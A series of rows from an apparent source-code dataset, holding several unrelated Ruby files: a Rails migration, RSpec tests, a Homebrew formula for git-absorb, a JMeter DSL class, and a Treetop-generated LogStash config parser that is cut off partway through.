| 25.888889 | 40 | 0.785408 |
b9ff123dbccbb116475c32da1da1523723720e29 | 135 | class AddCategoryIdToProposals < ActiveRecord::Migration[5.0]
def change
add_column :proposals, :category_id, :integer
end
end
| 22.5 | 61 | 0.77037 |
e82bf111b19c3f1ce2e2832e2a67f8a9eb599412 | 158 | require File.expand_path('../../../spec_helper', __FILE__)
require 'actor'
describe "Actor.receive" do
it "needs to be reviewed for spec completeness"
end
| 22.571429 | 58 | 0.734177 |
bfe7bcbee4c10cb77d12dc8ac834064ca0103379 | 828 | # frozen_string_literal: true
class CreateSubmissions < ActiveRecord::Migration[5.0]
def change
create_table :submissions do |t|
t.string :user_id, index: true
t.boolean :qualified
t.string :artist_id
t.string :title
t.string :medium
t.string :year
t.string :category
t.string :height
t.string :width
t.string :depth
t.string :dimensions_metric
t.boolean :signature
t.boolean :authenticity_certificate
t.text :provenance
t.string :location_city
t.string :location_state
t.string :location_country
t.date :deadline_to_sell
t.text :additional_info
t.timestamps
end
create_table :assets do |t|
t.string :asset_type
t.string :gemini_token
t.string :image_urls
end
end
end
| 23.657143 | 54 | 0.650966 |
5d780a24f856f2e58a74258c07d6601482986978 | 1,745 | class GitAbsorb < Formula
desc "Automatic git commit --fixup"
homepage "https://github.com/tummychow/git-absorb"
url "https://github.com/tummychow/git-absorb/archive/0.6.6.tar.gz"
sha256 "955069cc70a34816e6f4b6a6bd1892cfc0ae3d83d053232293366eb65599af2f"
license "BSD-3-Clause"
bottle do
rebuild 1
sha256 cellar: :any_skip_relocation, arm64_big_sur: "50ec784cd0089d5840025d2b108ac75b9b87b4ec786e9e4766304fc012cb3507"
sha256 cellar: :any_skip_relocation, big_sur: "5c90abd3d3058854758851749660bab97f06a9b60b01e6eb75da29c3c6fa3941"
sha256 cellar: :any_skip_relocation, catalina: "0d9b836c7c18d1284e31fe6d354cbfae95c513fae6855d7d8897dbaab3eacf0e"
sha256 cellar: :any_skip_relocation, mojave: "d5f13b0f733d6c2d1cd8c98008fcf51faccd3bd4312dd7742dc6a2cc695d0a34"
end
depends_on "rust" => :build
uses_from_macos "zlib"
def install
system "cargo", "install", *std_cargo_args
man1.install "Documentation/git-absorb.1"
(zsh_completion/"_git-absorb").write Utils.safe_popen_read("#{bin}/git-absorb", "--gen-completions", "zsh")
(bash_completion/"git-absorb").write Utils.safe_popen_read("#{bin}/git-absorb", "--gen-completions", "bash")
(fish_completion/"git-absorb.fish").write Utils.safe_popen_read("#{bin}/git-absorb", "--gen-completions", "fish")
end
test do
(testpath/".gitconfig").write <<~EOS
[user]
name = Real Person
email = [email protected]
EOS
system "git", "init"
(testpath/"test").write "foo"
system "git", "add", "test"
system "git", "commit", "--message", "Initial commit"
(testpath/"test").delete
(testpath/"test").write "bar"
system "git", "add", "test"
system "git", "absorb"
end
end
| 37.934783 | 122 | 0.715186 |
91284003eff7cbb48b1f83711fda27028ae8403e | 1,246 | require 'spec_helper'
describe Tinder::Connection do
describe "authentication" do
it "should raise an exception with bad credentials" do
FakeWeb.register_uri(:get, "http://foo:[email protected]/rooms.json",
:status => ["401", "Unauthorized"])
connection = Tinder::Connection.new('test', :token => 'foo')
lambda { connection.get('/rooms.json') }.should raise_error(Tinder::AuthenticationFailed)
end
it "should lookup token when username/password provided" do
FakeWeb.register_uri(:get, "http://user:[email protected]/users/me.json",
:body => fixture('users/me.json'), :content_type => "application/json")
connection = Tinder::Connection.new('test', :username => 'user', :password => 'pass')
connection.token.should == "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
end
it "should use basic auth for credentials" do
FakeWeb.register_uri(:get, "http://mytoken:[email protected]/rooms.json",
:body => fixture('rooms.json'), :content_type => "application/json")
connection = Tinder::Connection.new('test', :token => 'mytoken')
lambda { connection.get('/rooms.json') }.should_not raise_error
end
end
end | 42.965517 | 95 | 0.674157 |
ab52f5fd6fad1a62bf8b72fa5caa268dc906e7f3 | 871 | module RubyJmeter
class DSL
def transaction_controller(params={}, &block)
node = RubyJmeter::TransactionController.new(params)
attach_node(node, &block)
end
end
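# Minimal usage sketch; the surrounding test/threads/visit DSL calls are
# assumed from the wider gem and shown for illustration only:
#
#   test do
#     threads count: 1 do
#       transaction_controller name: 'Checkout' do
#         visit name: 'Home', url: 'http://example.com'
#       end
#     end
#   end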
class TransactionController
attr_accessor :doc
include Helper
def initialize(params={})
testname = params.kind_of?(Array) ? 'TransactionController' : (params[:name] || 'TransactionController')
@doc = Nokogiri::XML(<<-EOS.strip_heredoc)
<TransactionController guiclass="TransactionControllerGui" testclass="TransactionController" testname="#{testname}" enabled="true">
<boolProp name="TransactionController.parent">true</boolProp>
<boolProp name="TransactionController.includeTimers">false</boolProp>
</TransactionController>
EOS
update params
update_at_xpath params if params.is_a?(Hash) && params[:update_at_xpath]
end
end
end
| 32.259259 | 131 | 0.729047 |
28bf5ab71cafb17af9116593cff208cf70064925 | 74,136 | # Autogenerated from a Treetop grammar. Edits may be lost.
require "treetop"
require "logstash/config/config_ast"
module LogStashConfig
include Treetop::Runtime
def root
@root ||= :config
end
module Config0
def _
elements[0]
end
def plugin_section
elements[1]
end
end
module Config1
def _1
elements[0]
end
def plugin_section
elements[1]
end
def _2
elements[2]
end
def _3
elements[4]
end
end
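# Reconstructed sketch of the Treetop rule this method implements; the
# original grammar file is not part of this generated output, so the
# exact source notation is an assumption:
#   rule config
#     _ plugin_section _ (_ plugin_section)* _ <LogStash::Config::AST::Config>
#   end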
def _nt_config
start_index = index
if node_cache[:config].has_key?(index)
cached = node_cache[:config][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt__
s0 << r1
if r1
r2 = _nt_plugin_section
s0 << r2
if r2
r3 = _nt__
s0 << r3
if r3
s4, i4 = [], index
loop do
i5, s5 = index, []
r6 = _nt__
s5 << r6
if r6
r7 = _nt_plugin_section
s5 << r7
end
if s5.last
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
r5.extend(Config0)
else
@index = i5
r5 = nil
end
if r5
s4 << r5
else
break
end
end
r4 = instantiate_node(SyntaxNode,input, i4...index, s4)
s0 << r4
if r4
r8 = _nt__
s0 << r8
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Config,input, i0...index, s0)
r0.extend(Config1)
else
@index = i0
r0 = nil
end
node_cache[:config][start_index] = r0
r0
end
module Comment0
end
def _nt_comment
start_index = index
if node_cache[:comment].has_key?(index)
cached = node_cache[:comment][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
s0, i0 = [], index
loop do
i1, s1 = index, []
r3 = _nt_whitespace
if r3
r2 = r3
else
r2 = instantiate_node(SyntaxNode,input, index...index)
end
s1 << r2
if r2
if has_terminal?("#", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("#")
r4 = nil
end
s1 << r4
if r4
s5, i5 = [], index
loop do
if has_terminal?('\G[^\\r\\n]', true, index)
r6 = true
@index += 1
else
r6 = nil
end
if r6
s5 << r6
else
break
end
end
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
s1 << r5
if r5
if has_terminal?("\r", false, index)
r8 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("\r")
r8 = nil
end
if r8
r7 = r8
else
r7 = instantiate_node(SyntaxNode,input, index...index)
end
s1 << r7
if r7
if has_terminal?("\n", false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("\n")
r9 = nil
end
s1 << r9
end
end
end
end
if s1.last
r1 = instantiate_node(SyntaxNode,input, i1...index, s1)
r1.extend(Comment0)
else
@index = i1
r1 = nil
end
if r1
s0 << r1
else
break
end
end
if s0.empty?
@index = i0
r0 = nil
else
r0 = instantiate_node(LogStash::Config::AST::Comment,input, i0...index, s0)
end
node_cache[:comment][start_index] = r0
r0
end
def _nt__
start_index = index
if node_cache[:_].has_key?(index)
cached = node_cache[:_][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
s0, i0 = [], index
loop do
i1 = index
r2 = _nt_comment
if r2
r1 = r2
else
r3 = _nt_whitespace
if r3
r1 = r3
else
@index = i1
r1 = nil
end
end
if r1
s0 << r1
else
break
end
end
r0 = instantiate_node(LogStash::Config::AST::Whitespace,input, i0...index, s0)
node_cache[:_][start_index] = r0
r0
end
def _nt_whitespace
start_index = index
if node_cache[:whitespace].has_key?(index)
cached = node_cache[:whitespace][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
s0, i0 = [], index
loop do
if has_terminal?('\G[ \\t\\r\\n]', true, index)
r1 = true
@index += 1
else
r1 = nil
end
if r1
s0 << r1
else
break
end
end
if s0.empty?
@index = i0
r0 = nil
else
r0 = instantiate_node(LogStash::Config::AST::Whitespace,input, i0...index, s0)
end
node_cache[:whitespace][start_index] = r0
r0
end
module PluginSection0
def branch_or_plugin
elements[0]
end
def _
elements[1]
end
end
module PluginSection1
def plugin_type
elements[0]
end
def _1
elements[1]
end
def _2
elements[3]
end
end
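# Grammar sketch (reconstructed from the generated code below):
#   rule plugin_section
#     plugin_type _ "{" _ (branch_or_plugin _)* "}" <LogStash::Config::AST::PluginSection>
#   end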
def _nt_plugin_section
start_index = index
if node_cache[:plugin_section].has_key?(index)
cached = node_cache[:plugin_section][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_plugin_type
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("{", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
s5, i5 = [], index
loop do
i6, s6 = index, []
r7 = _nt_branch_or_plugin
s6 << r7
if r7
r8 = _nt__
s6 << r8
end
if s6.last
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
r6.extend(PluginSection0)
else
@index = i6
r6 = nil
end
if r6
s5 << r6
else
break
end
end
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
s0 << r5
if r5
if has_terminal?("}", false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r9 = nil
end
s0 << r9
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::PluginSection,input, i0...index, s0)
r0.extend(PluginSection1)
else
@index = i0
r0 = nil
end
node_cache[:plugin_section][start_index] = r0
r0
end
def _nt_branch_or_plugin
start_index = index
if node_cache[:branch_or_plugin].has_key?(index)
cached = node_cache[:branch_or_plugin][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
r1 = _nt_branch
if r1
r0 = r1
else
r2 = _nt_plugin
if r2
r0 = r2
else
@index = i0
r0 = nil
end
end
node_cache[:branch_or_plugin][start_index] = r0
r0
end
def _nt_plugin_type
start_index = index
if node_cache[:plugin_type].has_key?(index)
cached = node_cache[:plugin_type][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
if has_terminal?("input", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 5))
@index += 5
else
terminal_parse_failure("input")
r1 = nil
end
if r1
r0 = r1
else
if has_terminal?("filter", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 6))
@index += 6
else
terminal_parse_failure("filter")
r2 = nil
end
if r2
r0 = r2
else
if has_terminal?("output", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 6))
@index += 6
else
terminal_parse_failure("output")
r3 = nil
end
if r3
r0 = r3
else
@index = i0
r0 = nil
end
end
end
node_cache[:plugin_type][start_index] = r0
r0
end
module Plugins0
def _
elements[0]
end
def plugin
elements[1]
end
end
module Plugins1
def plugin
elements[0]
end
end
def _nt_plugins
start_index = index
if node_cache[:plugins].has_key?(index)
cached = node_cache[:plugins][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i1, s1 = index, []
r2 = _nt_plugin
s1 << r2
if r2
s3, i3 = [], index
loop do
i4, s4 = index, []
r5 = _nt__
s4 << r5
if r5
r6 = _nt_plugin
s4 << r6
end
if s4.last
r4 = instantiate_node(SyntaxNode,input, i4...index, s4)
r4.extend(Plugins0)
else
@index = i4
r4 = nil
end
if r4
s3 << r4
else
break
end
end
r3 = instantiate_node(SyntaxNode,input, i3...index, s3)
s1 << r3
end
if s1.last
r1 = instantiate_node(SyntaxNode,input, i1...index, s1)
r1.extend(Plugins1)
else
@index = i1
r1 = nil
end
if r1
r0 = r1
else
r0 = instantiate_node(SyntaxNode,input, index...index)
end
node_cache[:plugins][start_index] = r0
r0
end
module Plugin0
def whitespace
elements[0]
end
def _
elements[1]
end
def attribute
elements[2]
end
end
module Plugin1
def attribute
elements[0]
end
end
module Plugin2
def name
elements[0]
end
def _1
elements[1]
end
def _2
elements[3]
end
def attributes
elements[4]
end
def _3
elements[5]
end
end
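# Grammar sketch (reconstructed from the generated code below):
#   rule plugin
#     name _ "{" _ (attribute (whitespace _ attribute)*)? _ "}" <LogStash::Config::AST::Plugin>
#   end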
def _nt_plugin
start_index = index
if node_cache[:plugin].has_key?(index)
cached = node_cache[:plugin][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_name
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("{", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
i6, s6 = index, []
r7 = _nt_attribute
s6 << r7
if r7
s8, i8 = [], index
loop do
i9, s9 = index, []
r10 = _nt_whitespace
s9 << r10
if r10
r11 = _nt__
s9 << r11
if r11
r12 = _nt_attribute
s9 << r12
end
end
if s9.last
r9 = instantiate_node(SyntaxNode,input, i9...index, s9)
r9.extend(Plugin0)
else
@index = i9
r9 = nil
end
if r9
s8 << r9
else
break
end
end
r8 = instantiate_node(SyntaxNode,input, i8...index, s8)
s6 << r8
end
if s6.last
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
r6.extend(Plugin1)
else
@index = i6
r6 = nil
end
if r6
r5 = r6
else
r5 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r5
if r5
r13 = _nt__
s0 << r13
if r13
if has_terminal?("}", false, index)
r14 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r14 = nil
end
s0 << r14
end
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Plugin,input, i0...index, s0)
r0.extend(Plugin2)
else
@index = i0
r0 = nil
end
node_cache[:plugin][start_index] = r0
r0
end
def _nt_name
start_index = index
if node_cache[:name].has_key?(index)
cached = node_cache[:name][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
s1, i1 = [], index
loop do
if has_terminal?('\G[A-Za-z0-9_-]', true, index)
r2 = true
@index += 1
else
r2 = nil
end
if r2
s1 << r2
else
break
end
end
if s1.empty?
@index = i1
r1 = nil
else
r1 = instantiate_node(LogStash::Config::AST::Name,input, i1...index, s1)
end
if r1
r0 = r1
else
r3 = _nt_string
if r3
r0 = r3
else
@index = i0
r0 = nil
end
end
node_cache[:name][start_index] = r0
r0
end
module Attribute0
def name
elements[0]
end
def _1
elements[1]
end
def _2
elements[3]
end
def value
elements[4]
end
end
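# Grammar sketch (reconstructed from the generated code below):
#   rule attribute
#     name _ "=>" _ value <LogStash::Config::AST::Attribute>
#   end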
def _nt_attribute
start_index = index
if node_cache[:attribute].has_key?(index)
cached = node_cache[:attribute][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_name
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("=>", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("=>")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
r5 = _nt_value
s0 << r5
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Attribute,input, i0...index, s0)
r0.extend(Attribute0)
else
@index = i0
r0 = nil
end
node_cache[:attribute][start_index] = r0
r0
end
def _nt_value
start_index = index
if node_cache[:value].has_key?(index)
cached = node_cache[:value][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
r1 = _nt_plugin
if r1
r0 = r1
else
r2 = _nt_bareword
if r2
r0 = r2
else
r3 = _nt_string
if r3
r0 = r3
else
r4 = _nt_number
if r4
r0 = r4
else
r5 = _nt_array
if r5
r0 = r5
else
r6 = _nt_hash
if r6
r0 = r6
else
@index = i0
r0 = nil
end
end
end
end
end
end
node_cache[:value][start_index] = r0
r0
end
def _nt_array_value
start_index = index
if node_cache[:array_value].has_key?(index)
cached = node_cache[:array_value][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
r1 = _nt_bareword
if r1
r0 = r1
else
r2 = _nt_string
if r2
r0 = r2
else
r3 = _nt_number
if r3
r0 = r3
else
r4 = _nt_array
if r4
r0 = r4
else
r5 = _nt_hash
if r5
r0 = r5
else
@index = i0
r0 = nil
end
end
end
end
end
node_cache[:array_value][start_index] = r0
r0
end
module Bareword0
end
def _nt_bareword
start_index = index
if node_cache[:bareword].has_key?(index)
cached = node_cache[:bareword][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?('\G[A-Za-z_]', true, index)
r1 = true
@index += 1
else
r1 = nil
end
s0 << r1
if r1
s2, i2 = [], index
loop do
if has_terminal?('\G[A-Za-z0-9_]', true, index)
r3 = true
@index += 1
else
r3 = nil
end
if r3
s2 << r3
else
break
end
end
if s2.empty?
@index = i2
r2 = nil
else
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
end
s0 << r2
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Bareword,input, i0...index, s0)
r0.extend(Bareword0)
else
@index = i0
r0 = nil
end
node_cache[:bareword][start_index] = r0
r0
end
module DoubleQuotedString0
end
module DoubleQuotedString1
end
def _nt_double_quoted_string
start_index = index
if node_cache[:double_quoted_string].has_key?(index)
cached = node_cache[:double_quoted_string][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?('"', false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('"')
r1 = nil
end
s0 << r1
if r1
s2, i2 = [], index
loop do
i3 = index
if has_terminal?('\"', false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure('\"')
r4 = nil
end
if r4
r3 = r4
else
i5, s5 = index, []
i6 = index
if has_terminal?('"', false, index)
r7 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('"')
r7 = nil
end
if r7
r6 = nil
else
@index = i6
r6 = instantiate_node(SyntaxNode,input, index...index)
end
s5 << r6
if r6
if index < input_length
r8 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("any character")
r8 = nil
end
s5 << r8
end
if s5.last
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
r5.extend(DoubleQuotedString0)
else
@index = i5
r5 = nil
end
if r5
r3 = r5
else
@index = i3
r3 = nil
end
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
if r2
if has_terminal?('"', false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('"')
r9 = nil
end
s0 << r9
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::String,input, i0...index, s0)
r0.extend(DoubleQuotedString1)
else
@index = i0
r0 = nil
end
node_cache[:double_quoted_string][start_index] = r0
r0
end
module SingleQuotedString0
end
module SingleQuotedString1
end
def _nt_single_quoted_string
start_index = index
if node_cache[:single_quoted_string].has_key?(index)
cached = node_cache[:single_quoted_string][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("'", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("'")
r1 = nil
end
s0 << r1
if r1
s2, i2 = [], index
loop do
i3 = index
if has_terminal?("\\'", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("\\'")
r4 = nil
end
if r4
r3 = r4
else
i5, s5 = index, []
i6 = index
if has_terminal?("'", false, index)
r7 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("'")
r7 = nil
end
if r7
r6 = nil
else
@index = i6
r6 = instantiate_node(SyntaxNode,input, index...index)
end
s5 << r6
if r6
if index < input_length
r8 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("any character")
r8 = nil
end
s5 << r8
end
if s5.last
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
r5.extend(SingleQuotedString0)
else
@index = i5
r5 = nil
end
if r5
r3 = r5
else
@index = i3
r3 = nil
end
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
if r2
if has_terminal?("'", false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("'")
r9 = nil
end
s0 << r9
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::String,input, i0...index, s0)
r0.extend(SingleQuotedString1)
else
@index = i0
r0 = nil
end
node_cache[:single_quoted_string][start_index] = r0
r0
end
def _nt_string
start_index = index
if node_cache[:string].has_key?(index)
cached = node_cache[:string][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
r1 = _nt_double_quoted_string
if r1
r0 = r1
else
r2 = _nt_single_quoted_string
if r2
r0 = r2
else
@index = i0
r0 = nil
end
end
node_cache[:string][start_index] = r0
r0
end
module Regexp0
end
module Regexp1
end
def _nt_regexp
start_index = index
if node_cache[:regexp].has_key?(index)
cached = node_cache[:regexp][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?('/', false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('/')
r1 = nil
end
s0 << r1
if r1
s2, i2 = [], index
loop do
i3 = index
if has_terminal?('\/', false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure('\/')
r4 = nil
end
if r4
r3 = r4
else
i5, s5 = index, []
i6 = index
if has_terminal?('/', false, index)
r7 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('/')
r7 = nil
end
if r7
r6 = nil
else
@index = i6
r6 = instantiate_node(SyntaxNode,input, index...index)
end
s5 << r6
if r6
if index < input_length
r8 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("any character")
r8 = nil
end
s5 << r8
end
if s5.last
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
r5.extend(Regexp0)
else
@index = i5
r5 = nil
end
if r5
r3 = r5
else
@index = i3
r3 = nil
end
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
if r2
if has_terminal?('/', false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure('/')
r9 = nil
end
s0 << r9
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::RegExp,input, i0...index, s0)
r0.extend(Regexp1)
else
@index = i0
r0 = nil
end
node_cache[:regexp][start_index] = r0
r0
end
module Number0
end
module Number1
end
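# Grammar sketch (reconstructed from the generated code below):
#   rule number
#     "-"? [0-9]+ ("." [0-9]*)? <LogStash::Config::AST::Number>
#   end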
def _nt_number
start_index = index
if node_cache[:number].has_key?(index)
cached = node_cache[:number][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("-", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("-")
r2 = nil
end
if r2
r1 = r2
else
r1 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r1
if r1
s3, i3 = [], index
loop do
if has_terminal?('\G[0-9]', true, index)
r4 = true
@index += 1
else
r4 = nil
end
if r4
s3 << r4
else
break
end
end
if s3.empty?
@index = i3
r3 = nil
else
r3 = instantiate_node(SyntaxNode,input, i3...index, s3)
end
s0 << r3
if r3
i6, s6 = index, []
if has_terminal?(".", false, index)
r7 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(".")
r7 = nil
end
s6 << r7
if r7
s8, i8 = [], index
loop do
if has_terminal?('\G[0-9]', true, index)
r9 = true
@index += 1
else
r9 = nil
end
if r9
s8 << r9
else
break
end
end
r8 = instantiate_node(SyntaxNode,input, i8...index, s8)
s6 << r8
end
if s6.last
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
r6.extend(Number0)
else
@index = i6
r6 = nil
end
if r6
r5 = r6
else
r5 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r5
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Number,input, i0...index, s0)
r0.extend(Number1)
else
@index = i0
r0 = nil
end
node_cache[:number][start_index] = r0
r0
end
module Array0
def _1
elements[0]
end
def _2
elements[2]
end
def value
elements[3]
end
end
module Array1
def value
elements[0]
end
end
module Array2
def _1
elements[1]
end
def _2
elements[3]
end
end
def _nt_array
start_index = index
if node_cache[:array].has_key?(index)
cached = node_cache[:array][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("[", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("[")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
i4, s4 = index, []
r5 = _nt_value
s4 << r5
if r5
s6, i6 = [], index
loop do
i7, s7 = index, []
r8 = _nt__
s7 << r8
if r8
if has_terminal?(",", false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(",")
r9 = nil
end
s7 << r9
if r9
r10 = _nt__
s7 << r10
if r10
r11 = _nt_value
s7 << r11
end
end
end
if s7.last
r7 = instantiate_node(SyntaxNode,input, i7...index, s7)
r7.extend(Array0)
else
@index = i7
r7 = nil
end
if r7
s6 << r7
else
break
end
end
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
s4 << r6
end
if s4.last
r4 = instantiate_node(SyntaxNode,input, i4...index, s4)
r4.extend(Array1)
else
@index = i4
r4 = nil
end
if r4
r3 = r4
else
r3 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r3
if r3
r12 = _nt__
s0 << r12
if r12
if has_terminal?("]", false, index)
r13 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("]")
r13 = nil
end
s0 << r13
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Array,input, i0...index, s0)
r0.extend(Array2)
else
@index = i0
r0 = nil
end
node_cache[:array][start_index] = r0
r0
end
module Hash0
def _1
elements[1]
end
def _2
elements[3]
end
end
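# Grammar sketch (reconstructed from the generated code below):
#   rule hash
#     "{" _ hashentries? _ "}" <LogStash::Config::AST::Hash>
#   end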
def _nt_hash
start_index = index
if node_cache[:hash].has_key?(index)
cached = node_cache[:hash][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("{", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r4 = _nt_hashentries
if r4
r3 = r4
else
r3 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r3
if r3
r5 = _nt__
s0 << r5
if r5
if has_terminal?("}", false, index)
r6 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r6 = nil
end
s0 << r6
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Hash,input, i0...index, s0)
r0.extend(Hash0)
else
@index = i0
r0 = nil
end
node_cache[:hash][start_index] = r0
r0
end
module Hashentries0
def whitespace
elements[0]
end
def hashentry
elements[1]
end
end
module Hashentries1
def hashentry
elements[0]
end
end
def _nt_hashentries
start_index = index
if node_cache[:hashentries].has_key?(index)
cached = node_cache[:hashentries][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
